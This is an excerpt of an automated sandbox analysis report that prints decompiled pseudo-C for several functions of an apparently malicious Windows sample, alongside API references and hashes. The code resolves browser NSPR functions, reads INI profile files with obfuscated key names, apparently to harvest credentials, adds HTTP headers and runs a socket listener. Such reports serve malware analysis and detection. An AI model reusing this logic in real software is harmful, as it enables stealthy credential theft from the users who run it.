            0x0040a76a
            0x0040a774
            0x0040a77d
            0x0040a78b
            0x0040a794
            0x0040a7a1
            0x0040a7b3
            0x0040a7c5
            0x0040a7ca
            0x0040a7cc
            0x0040a7d2

            APIs
            • InitializeCriticalSection.KERNEL32(0041A9F0,761B4EE0,00406556,0041A140,00000000,?,00000000,00000000), ref: 0040A76A
            • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040A7A6
            • GetProcAddress.KERNEL32(PR_SetError), ref: 0040A7B8
            • GetProcAddress.KERNEL32(PR_GetError), ref: 0040A7CA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$CriticalInitializeSection
            • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
            • API String ID: 2804437462-2578621715
            • Opcode ID: a20470ef866b08492ba3aa275ae2d17028f15ac541d8cb6d0b27057fa8fd289f
            • Instruction ID: 06e3b6302f31b1b7b71ecd45e9b6986731216e7eaace2c9a2fd35ff310fb9603
            • Opcode Fuzzy Hash: a20470ef866b08492ba3aa275ae2d17028f15ac541d8cb6d0b27057fa8fd289f
            • Instruction Fuzzy Hash: FA01FBF4A133509FC310CF65ED096963FE0EB48360B01C83BA444A32B2D37854A0CF8A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040850F Relevance: 12.2, APIs: 8, Instructions: 180memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 94%
            			E0040850F(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				int _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				WCHAR* _v656;
				WCHAR* _v660;
				void* __edi;
				void* __esi;
				WCHAR* _t56;
				WCHAR* _t59;
				short* _t61;
				WCHAR* _t62;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				void* _t71;
				WCHAR* _t74;
				WCHAR* _t75;
				long _t79;
				int _t82;
				WCHAR* _t85;
				long _t87;
				long _t90;
				WCHAR* _t91;
				void* _t92;
				WCHAR* _t95;
				WCHAR* _t96;
				WCHAR* _t114;
				WCHAR* _t119;
				intOrPtr _t127;
				signed int _t128;
				void* _t130;

				_t130 = (_t128 & 0xfffffff8) - 0x28c;
				if(E00415D45( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t133 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t119 = HeapAlloc( *0x41bc68, 8, 0x20002);
					_v640 = _t119;
					__eflags = _t119;
					if(_t119 == 0) {
						goto L21;
					}
					_t56 = GetPrivateProfileStringW(0, 0, 0, _t119, 0xffff,  &_v524);
					__eflags = _t56;
					if(_t56 <= 0) {
						L20:
						E00410418(_t119);
						goto L21;
					}
					_t9 =  &(_t56[0]); // 0x1
					_t59 = E0041131B(_t119, _t9);
					__eflags = _t59;
					if(_t59 == 0) {
						goto L20;
					}
					_t114 = HeapAlloc( *0x41bc68, 8, 0xc20);
					_v644 = _t114;
					__eflags = _t114;
					if(_t114 != 0) {
						_t11 =  &(_t114[0x1fe]); // 0x3fc
						_t61 = _t11;
						_v648 = _t61;
						_t62 =  &(_t61[0xff]);
						__eflags = _t62;
						_v636 = _t62;
						_v652 = _t119;
						_t63 = 0x49;
						E0040F369(_t63,  &_v584);
						_t65 = 0x4a;
						E0040F369(_t65,  &_v596);
						_t67 = 0x4b;
						E0040F369(_t67,  &_v608);
						_t69 = 0x4c;
						E0040F369(_t69,  &_v616);
						_t71 = 0x4d;
						E0040F369(_t71,  &_v624);
						do {
							_t74 = StrStrIW(_v652,  &_v584);
							__eflags = _t74;
							if(_t74 == 0) {
								_t79 = GetPrivateProfileStringW(_v656,  &_v600, 0, _t114, 0xff,  &_v528);
								__eflags = _t79;
								if(_t79 > 0) {
									_t82 = GetPrivateProfileIntW(_v656,  &_v612, 0x15,  &_v528);
									_v632 = _t82;
									__eflags = _t82 - 1 - 0xfffe;
									if(_t82 - 1 <= 0xfffe) {
										_t30 =  &(_t114[0xff]); // 0x1fe
										_t85 = _t30;
										_v636 = _t85;
										_t87 = GetPrivateProfileStringW(_v656,  &_v620, 0, _t85, 0xff,  &_v528);
										__eflags = _t87;
										if(_t87 > 0) {
											_t90 = GetPrivateProfileStringW(_v656,  &_v628, 0, _v652, 0xff,  &_v528);
											__eflags = _t90;
											if(_t90 > 0) {
												_t91 = E00411098(_v652);
												__eflags = _t91;
												if(_t91 > 0) {
													_t126 =  &_v568;
													_t92 = 0x2c;
													E0040F369(_t92,  &_v568);
													_push(_v632);
													_push(_t114);
													_push(_v652);
													_t115 = _v640;
													_push(_v636);
													_t95 = E004111A5(_t126, 0x311, _v640, _t126);
													_t130 = _t130 + 0x14;
													__eflags = _t95;
													if(_t95 > 0) {
														_t127 = _a4;
														_t96 = E00410818(_t95, _t127, _t115);
														__eflags = _t96;
														if(_t96 != 0) {
															_t45 = _t127 + 4;
															 *_t45 =  &(( *(_t127 + 4))[0]);
															__eflags =  *_t45;
														}
													}
													_t114 = _v648;
												}
											}
										}
									}
								}
							}
							_t75 = E00411359(_v656, 1);
							_v660 = _t75;
							__eflags = _t75;
						} while (_t75 != 0);
						E00410418(_t114);
						_t119 = _v648;
					}
					goto L20;
				} else {
					E004084D7(_t133,  &_v524, _a4);
					goto L21;
				}
			}


















































            0x00408515
            0x00408533
            0x0040873d
            0x00408745
            0x00408745
            0x00408539
            0x0040853c
            0x00408568
            0x0040856c
            0x00408570
            0x00408572
            0x00000000
            0x00000000
            0x0040858f
            0x00408591
            0x00408593
            0x00408737
            0x00408738
            0x00000000
            0x00408738
            0x00408599
            0x0040859e
            0x004085a3
            0x004085a5
            0x00000000
            0x00000000
            0x004085ba
            0x004085bc
            0x004085c0
            0x004085c2
            0x004085c8
            0x004085c8
            0x004085ce
            0x004085d2
            0x004085d2
            0x004085d9
            0x004085dd
            0x004085e5
            0x004085e6
            0x004085f1
            0x004085f2
            0x004085fd
            0x004085fe
            0x00408609
            0x0040860a
            0x00408615
            0x00408616
            0x0040861b
            0x00408624
            0x0040862a
            0x0040862c
            0x0040864c
            0x0040864e
            0x00408650
            0x00408669
            0x0040866f
            0x00408674
            0x00408679
            0x00408688
            0x00408688
            0x0040868f
            0x0040869e
            0x004086a0
            0x004086a2
            0x004086bc
            0x004086be
            0x004086c0
            0x004086c6
            0x004086cb
            0x004086cd
            0x004086d1
            0x004086d5
            0x004086d6
            0x004086db
            0x004086e1
            0x004086e2
            0x004086e6
            0x004086ea
            0x004086f4
            0x004086f9
            0x004086fc
            0x004086fe
            0x00408700
            0x00408706
            0x0040870b
            0x0040870d
            0x0040870f
            0x0040870f
            0x0040870f
            0x0040870f
            0x0040870d
            0x00408712
            0x00408712
            0x004086cd
            0x004086c0
            0x004086a2
            0x00408679
            0x00408650
            0x0040871c
            0x00408721
            0x00408725
            0x00408725
            0x0040872e
            0x00408733
            0x00408733
            0x00000000
            0x0040853e
            0x00408549
            0x00000000
            0x00408549

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • HeapAlloc.KERNEL32(00000008,00020002,?), ref: 00408566
            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040858F
            • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004085B8
            • StrStrIW.SHLWAPI(?,?), ref: 00408624
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 0040864C
            • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00408669
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 0040869E
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: PrivateProfile$String$AllocHeap$CombinePath
            • String ID:
            • API String ID: 3432043379-0
            • Opcode ID: 93e4f6491013904f4b9aa8ec7a0e358a635758e752a0db93495e68b2a8f995dc
            • Instruction ID: bbb8931d5b34c0e664ac83ce98ae93ef364f7b5f13b77b3723d65bc5b59c2e45
            • Opcode Fuzzy Hash: 93e4f6491013904f4b9aa8ec7a0e358a635758e752a0db93495e68b2a8f995dc
            • Instruction Fuzzy Hash: 75519172504306AED720DB65CD41FABB7E8EF84754F10083EBA84F3291DB38D9458796
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040C7FC Relevance: 12.2, APIs: 8, Instructions: 166COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040C7FC(void* __ecx, void* __edx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v88;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v109;
				char _v112;
				char _v120;
				intOrPtr _v156;
				char _v157;
				signed int _v160;
				intOrPtr _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t83;
				signed int _t86;
				intOrPtr _t87;
				void* _t90;
				void* _t94;
				void* _t98;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed char* _t118;
				signed int _t119;
				struct _CRITICAL_SECTION* _t125;
				intOrPtr _t130;
				char* _t138;
				char* _t139;
				char* _t140;
				signed int _t142;
				signed int _t148;

				_v104 = _v104 | 0xffffffff;
				_t121 =  &_v60;
				if(E0040C72B( &_v60, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E00407754( &_v60);
					return _v104;
				}
				_t83 = E00406ECA(__edx, _t121);
				_v104 = _t83;
				if((1 & _t83) == 0) {
					__eflags = _t83 & 0x00000002;
					if((_t83 & 0x00000002) == 0) {
						_t125 = 0x41aa60;
						L18:
						__eflags = _v100 & 0x00000004;
						if((_v100 & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v28;
						 *_a12 = _v24;
						EnterCriticalSection(_t125);
						_t146 = _a4;
						_t86 = E0040BDA6(_a4);
						__eflags = _t86 - 0xffffffff;
						if(_t86 != 0xffffffff) {
							L21:
							_t87 =  *0x41aa78; // 0x0
							_t148 = _t86 * 0x24;
							__eflags = _t148;
							E00410418( *((intOrPtr*)(_t148 + _t87 + 8)));
							_t130 =  *0x41aa78; // 0x0
							 *((intOrPtr*)(_t148 + _t130 + 8)) = _v32;
							L22:
							LeaveCriticalSection(_t125);
							goto L23;
						}
						_t86 = E0040BDCC(_t86, _t146);
						__eflags = _t86 - 0xffffffff;
						if(_t86 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v108 = _v108 & 0x00000000;
					_v109 = 1;
					__eflags = _v16 - 1;
					if(_v16 != 1) {
						L9:
						_t138 =  &_v88;
						_t90 = 0x20;
						E0040F333(_t90, _t138);
						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
						_t139 =  &_v112;
						_t94 = 0x21;
						E0040F333(_t94, _t139);
						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
						_t140 =  &_v120;
						_t98 = 0x22;
						E0040F333(_t98, _t140);
						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
						L10:
						_t125 = 0x41aa60;
						EnterCriticalSection(0x41aa60);
						__eflags = _v157;
						if(_v157 == 0) {
							L14:
							E004077A6(_v64, _v68);
							__eflags = _v160;
							if(_v160 != 0) {
								E00411F0E(_v156);
							}
							L16:
							LeaveCriticalSection(_t125);
							goto L18;
						}
						_t150 = _a4;
						_t105 = E0040BDA6(_a4);
						__eflags = _t105 - 0xffffffff;
						if(_t105 != 0xffffffff) {
							L13:
							_t106 =  *0x41aa78; // 0x0
							_t142 = _t105 * 0x24;
							E004077A6( *((intOrPtr*)(_t106 + _t142 + 0x10)),  *((intOrPtr*)(_t106 + _t142 + 0xc)));
							_t110 =  *0x41aa78; // 0x0
							E00410418( *((intOrPtr*)(_t142 + _t110 + 0x14)));
							_t112 =  *0x41aa78; // 0x0
							 *(_t142 + _t112 + 0x14) =  *(_t142 + _t112 + 0x14) & 0x00000000;
							_t113 =  *0x41aa78; // 0x0
							 *(_t142 + _t113 + 0x1c) =  *(_t142 + _t113 + 0x1c) & 0x00000000;
							_t114 =  *0x41aa78; // 0x0
							 *(_t142 + _t114 + 0x18) =  *(_t142 + _t114 + 0x18) | 0xffffffff;
							_t115 =  *0x41aa78; // 0x0
							 *((intOrPtr*)(_t142 + _t115 + 0xc)) = _v76;
							_t116 =  *0x41aa78; // 0x0
							 *((intOrPtr*)(_t142 + _t116 + 0x10)) = _v72;
							_t117 =  *0x41aa78; // 0x0
							 *((intOrPtr*)(_t142 + _t117 + 0x20)) = _v164;
							goto L16;
						}
						_t105 = E0040BDCC(_t105, _t150);
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t118 = _v20;
					__eflags =  *_t118 & 0x00000003;
					if(( *_t118 & 0x00000003) == 0) {
						goto L9;
					}
					_t119 = E00407A04(_t118,  &_v60);
					_v108 = _t119;
					__eflags = _t119;
					if(_t119 != 0) {
						_v104 = 1;
					} else {
						_v109 = _t119;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v104 = _v104 & 0x00000000;
					goto L23;
				}
			}



















































            0x0040c808
            0x0040c817
            0x0040c825
            0x0040ca0a
            0x0040ca0e
            0x0040ca1d
            0x0040ca1d
            0x0040c82e
            0x0040c836
            0x0040c83c
            0x0040c853
            0x0040c855
            0x0040c9a5
            0x0040c9aa
            0x0040c9aa
            0x0040c9af
            0x00000000
            0x00000000
            0x0040c9b8
            0x0040c9c2
            0x0040c9c4
            0x0040c9ca
            0x0040c9cd
            0x0040c9d2
            0x0040c9d5
            0x0040c9e2
            0x0040c9e4
            0x0040c9e9
            0x0040c9e9
            0x0040c9f0
            0x0040c9f9
            0x0040c9ff
            0x0040ca03
            0x0040ca04
            0x00000000
            0x0040ca04
            0x0040c9d8
            0x0040c9dd
            0x0040c9e0
            0x00000000
            0x00000000
            0x00000000
            0x0040c9e0
            0x0040c85b
            0x0040c860
            0x0040c864
            0x0040c868
            0x0040c890
            0x0040c892
            0x0040c896
            0x0040c897
            0x0040c8af
            0x0040c8b3
            0x0040c8b7
            0x0040c8b8
            0x0040c8cb
            0x0040c8cf
            0x0040c8d3
            0x0040c8d4
            0x0040c8e2
            0x0040c8e4
            0x0040c8e4
            0x0040c8ea
            0x0040c8f0
            0x0040c8f5
            0x0040c97f
            0x0040c987
            0x0040c98c
            0x0040c991
            0x0040c997
            0x0040c997
            0x0040c99c
            0x0040c99d
            0x00000000
            0x0040c99d
            0x0040c8fb
            0x0040c8fe
            0x0040c903
            0x0040c906
            0x0040c913
            0x0040c915
            0x0040c91a
            0x0040c925
            0x0040c92a
            0x0040c933
            0x0040c938
            0x0040c93d
            0x0040c942
            0x0040c947
            0x0040c94c
            0x0040c951
            0x0040c956
            0x0040c95f
            0x0040c963
            0x0040c96c
            0x0040c970
            0x0040c979
            0x00000000
            0x0040c979
            0x0040c909
            0x0040c90e
            0x0040c911
            0x00000000
            0x00000000
            0x00000000
            0x0040c911
            0x0040c86a
            0x0040c86e
            0x0040c871
            0x00000000
            0x00000000
            0x0040c877
            0x0040c87c
            0x0040c880
            0x0040c882
            0x0040c88a
            0x0040c884
            0x0040c884
            0x0040c884
            0x00000000
            0x0040c83e
            0x0040c843
            0x0040c849
            0x00000000
            0x0040c849

            APIs
              • Part of subcall function 00406ECA: EnterCriticalSection.KERNEL32(0041A9BC), ref: 00406EE5
              • Part of subcall function 00406ECA: LeaveCriticalSection.KERNEL32(0041A9BC), ref: 00406F66
            • SetLastError.KERNEL32(00002F78), ref: 0040C843
            • EnterCriticalSection.KERNEL32(0041AA60), ref: 0040C8EA
            • LeaveCriticalSection.KERNEL32(0041AA60,?), ref: 0040C99D
            • EnterCriticalSection.KERNEL32(0041AA60), ref: 0040C9C4
            • LeaveCriticalSection.KERNEL32(0041AA60,?), ref: 0040CA04
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave$ErrorLast
            • String ID:
            • API String ID: 486337731-0
            • Opcode ID: 9e8f8f973118ed20fc7b06bb4ea0734f163cdd2adf5dd79176d9074b62167420
            • Instruction ID: b7716c48ca11ba2bf9d44a5f05619e29c537168c829ee91d619ffa9734da9891
            • Opcode Fuzzy Hash: 9e8f8f973118ed20fc7b06bb4ea0734f163cdd2adf5dd79176d9074b62167420
            • Instruction Fuzzy Hash: BB51A071504341DBD711EF28CC85A9A7BA0EF85364F148B3AF854A72E1C338ED51CB8A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408100 Relevance: 12.2, APIs: 8, Instructions: 153memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00408100(void* __edx, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				short* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t41;
				long _t42;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t58;
				WCHAR* _t62;
				WCHAR* _t65;
				void* _t73;
				void* _t77;
				WCHAR* _t85;
				WCHAR* _t86;
				intOrPtr _t98;
				void* _t99;

				_t83 = __edx;
				_t41 = HeapAlloc( *0x41bc68, 8, 0x20002);
				_v16 = _t41;
				if(_t41 == 0) {
					return _t41;
				}
				_t42 = GetPrivateProfileStringW(0, 0, 0, _t41, 0xffff, _a4);
				if(_t42 <= 0) {
					L17:
					return E00410418(_v16);
				}
				_t3 = _t42 + 1; // 0x1
				if(E0041131B(_v16, _t3) == 0) {
					goto L17;
				}
				_t85 = HeapAlloc( *0x41bc68, 8, 0xc0c);
				_v12 = _t85;
				if(_t85 == 0) {
					goto L17;
				} else {
					_t6 =  &(_t85[0x1fe]); // 0x3fc
					_v20 =  &(_t6[0xff]);
					_v8 = _v16;
					_t50 = 0x3c;
					E0040F369(_t50,  &_v112);
					_t52 = 0x3d;
					E0040F369(_t52,  &_v48);
					_t54 = 0x3e;
					E0040F369(_t54,  &_v32);
					_t56 = 0x3f;
					E0040F369(_t56,  &_v88);
					_t58 = 0x40;
					E0040F369(_t58,  &_v68);
					goto L6;
					L15:
					_t62 = E00411359(_v8, 1);
					_v8 = _t62;
					if(_t62 != 0) {
						_t85 = _v12;
						L6:
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t65 = StrStrIW(_v8,  &_v48);
							if(_t65 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t65, _t85, 0xff, _a4) > 0) {
								_t86 =  &(_t85[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t86, 0xff, _a4) > 0) {
									_t28 =  &(_t86[0xff]); // 0x0
									_t96 = _t28;
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t28, 0xff, _a4) > 0 && E00407F94(_t83, _t96) > 0) {
										_t97 =  &_v144;
										_t73 = 0x2d;
										E0040F369(_t73,  &_v144);
										_push(_v12);
										_t32 =  &(_t86[0xff]); // 0x0
										_push(_t86);
										_t87 = _v20;
										_t83 = 0x307;
										_t77 = E004111A5(_t97, 0x307, _v20, _t97);
										_t99 = _t99 + 0x10;
										if(_t77 > 0) {
											_t98 = _a8;
											if(E00410818(_t77, _t98, _t87) != 0) {
												 *((intOrPtr*)(_t98 + 4)) =  *((intOrPtr*)(_t98 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E00410418(_v12);
						goto L17;
					}
				}
			}






























            0x00408100
            0x0040811f
            0x00408123
            0x00408128
            0x004082b6
            0x004082b6
            0x00408140
            0x00408144
            0x004082aa
            0x00000000
            0x004082ad
            0x0040814a
            0x00408157
            0x00000000
            0x00000000
            0x0040816c
            0x0040816e
            0x00408173
            0x00000000
            0x00408179
            0x00408179
            0x00408184
            0x0040818c
            0x00408192
            0x00408193
            0x0040819d
            0x0040819e
            0x004081a8
            0x004081a9
            0x004081b3
            0x004081b4
            0x004081be
            0x004081bf
            0x004081c4
            0x0040828d
            0x00408292
            0x00408297
            0x0040829c
            0x004081c6
            0x004081c9
            0x004081da
            0x004081e7
            0x004081eb
            0x00408210
            0x00408225
            0x0040822e
            0x0040822e
            0x0040823f
            0x0040824d
            0x00408253
            0x00408254
            0x00408259
            0x0040825c
            0x00408263
            0x00408264
            0x0040826a
            0x0040826f
            0x00408274
            0x00408279
            0x0040827b
            0x00408288
            0x0040828a
            0x0040828a
            0x00408288
            0x00408279
            0x0040823f
            0x00408225
            0x004081eb
            0x00000000
            0x004082a2
            0x004082a5
            0x00000000
            0x004082a5
            0x0040829c

            APIs
            • HeapAlloc.KERNEL32(00000008,00020002,?,?,00000104), ref: 0040811F
            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00408140
            • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 0040816A
            • StrStrIW.SHLWAPI(00000001,?), ref: 004081D6
            • StrStrIW.SHLWAPI(00000001,?), ref: 004081E7
            • GetPrivateProfileStringW.KERNEL32(00000001,?,00000000,?,000000FF,?), ref: 00408203
            • GetPrivateProfileStringW.KERNEL32(00000001,?,00000000,?,000000FF,?), ref: 00408221
            • GetPrivateProfileStringW.KERNEL32(00000001,?,00000000,?,000000FF,?), ref: 0040823B
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: PrivateProfileString$AllocHeap
            • String ID:
            • API String ID: 2479592106-0
            • Opcode ID: a50db90859ff1da6f4125af1de47ef46459538eb0afd7578374cbe7b4f4f7439
            • Instruction ID: 82136f4fb06a4c767ec4481982ff55a3112a3caf3568287c513a59a9e44dd443
            • Opcode Fuzzy Hash: a50db90859ff1da6f4125af1de47ef46459538eb0afd7578374cbe7b4f4f7439
            • Instruction Fuzzy Hash: 0B416E31D0061AFAEF10ABA5CD41EEEBB79EF44754F10407AE904F72A1DB389E458B94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040F151 Relevance: 12.2, APIs: 8, Instructions: 151synchronizationnetworkCOMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E0040F151(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				long _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				long _t48;
				void* _t49;
				void* _t55;
				long _t56;
				long _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				long _t69;
				void* _t72;
				long _t77;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E00403D00(__ecx, __eflags, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					_t48 = E00403E39();
					__eflags = _t48;
					if(_t48 == 0) {
						L26:
						E00413A4E(_v148);
						_t49 = 0;
						__eflags = 0;
						L27:
						return _t49;
					}
					E004060A9(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E0040F007( &_v160, _v78,  &_v168) & 0x0000ffff;
					__eflags = _t94;
					if(_t94 != 0) {
						L7:
						__eflags = _t94 - _v74;
						if(_t94 != _v74) {
							E00406140( &_v124);
							_v78 = _t94;
							E00406198( &_v128);
						}
						_t55 =  *0x41a758; // 0x0
						_v144 = _t55;
						_t56 = _v152;
						_v172 = 1;
						__eflags = _t56;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						__eflags = _t57;
						if(_t57 != 0) {
							_t87 = _v172;
							_t20 =  &_v172;
							 *_t20 = _v172 + 1;
							__eflags =  *_t20;
							 *(_t100 + 0x2c + _v172 * 4) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						__eflags = _t59;
						if(_t59 <= 0) {
							L25:
							E0041361F(_t59, _v156);
							E0041361F(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(1) {
								__eflags = _t59 - _v172;
								if(_t59 >= _v172) {
									goto L25;
								}
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								__eflags = _t64 - _v152;
								if(_t64 != _v152) {
									__eflags = _t64 - _v160;
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t65 =  *_t85(_v168, 0, 0);
											_t97 = _t65;
											__eflags = _t97 - 0xffffffff;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E00413677(_t87, _t97);
											_t69 = E00411E25(0x20000, E0040F084, _t97);
											__eflags = _t69;
											if(_t69 == 0) {
												E0041361F(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										__eflags = _t59;
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t77 = WaitForSingleObject( *0x41a758, 0x3e8);
						__eflags = _t77 - 0x102;
						if(_t77 != 0x102) {
							break;
						}
						_t87 = _v74;
						_t94 = E0040F007( &_v156, _v74,  &_v164) & 0x0000ffff;
						__eflags = _t94;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					__eflags = _t94;
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}




































            0x0040f157
            0x0040f162
            0x0040f169
            0x0040f170
            0x0040f176
            0x0040f180
            0x0040f185
            0x0040f187
            0x0040f31f
            0x0040f323
            0x0040f328
            0x0040f328
            0x0040f32a
            0x0040f330
            0x0040f330
            0x0040f192
            0x0040f197
            0x0040f1a9
            0x0040f1ac
            0x0040f1af
            0x0040f1ec
            0x0040f1ec
            0x0040f1f1
            0x0040f1f8
            0x0040f202
            0x0040f207
            0x0040f207
            0x0040f20c
            0x0040f211
            0x0040f215
            0x0040f219
            0x0040f221
            0x0040f223
            0x0040f225
            0x0040f229
            0x0040f229
            0x0040f22d
            0x0040f231
            0x0040f233
            0x0040f235
            0x0040f239
            0x0040f239
            0x0040f239
            0x0040f23d
            0x0040f23d
            0x0040f24d
            0x0040f253
            0x0040f255
            0x0040f2fb
            0x0040f2ff
            0x0040f314
            0x0040f31d
            0x00000000
            0x0040f25b
            0x0040f25b
            0x0040f261
            0x0040f261
            0x0040f265
            0x00000000
            0x00000000
            0x0040f26b
            0x0040f26f
            0x0040f273
            0x0040f27b
            0x0040f27f
            0x0040f2d3
            0x0040f2d3
            0x0040f2d9
            0x0040f2db
            0x0040f2dd
            0x0040f2e0
            0x00000000
            0x00000000
            0x0040f28e
            0x0040f2aa
            0x0040f2ae
            0x0040f2b5
            0x0040f2c5
            0x0040f2ca
            0x0040f2cc
            0x0040f2ce
            0x0040f2ce
            0x0040f2cc
            0x0040f2ed
            0x0040f2f3
            0x0040f2f5
            0x00000000
            0x00000000
            0x00000000
            0x0040f2f5
            0x0040f281
            0x0040f285
            0x0040f285
            0x00000000
            0x0040f285
            0x0040f275
            0x00000000
            0x0040f275
            0x00000000
            0x0040f261
            0x00000000
            0x00000000
            0x00000000
            0x0040f1b1
            0x0040f1b1
            0x0040f1bc
            0x0040f1c2
            0x0040f1c7
            0x00000000
            0x00000000
            0x0040f1c9
            0x0040f1db
            0x0040f1de
            0x0040f1e1
            0x00000000
            0x00000000
            0x00000000
            0x0040f1e1
            0x0040f1e3
            0x0040f1e6
            0x00000000
            0x00000000
            0x00000000
            0x0040f1e6
            0x0040f17a
            0x00000000

            APIs
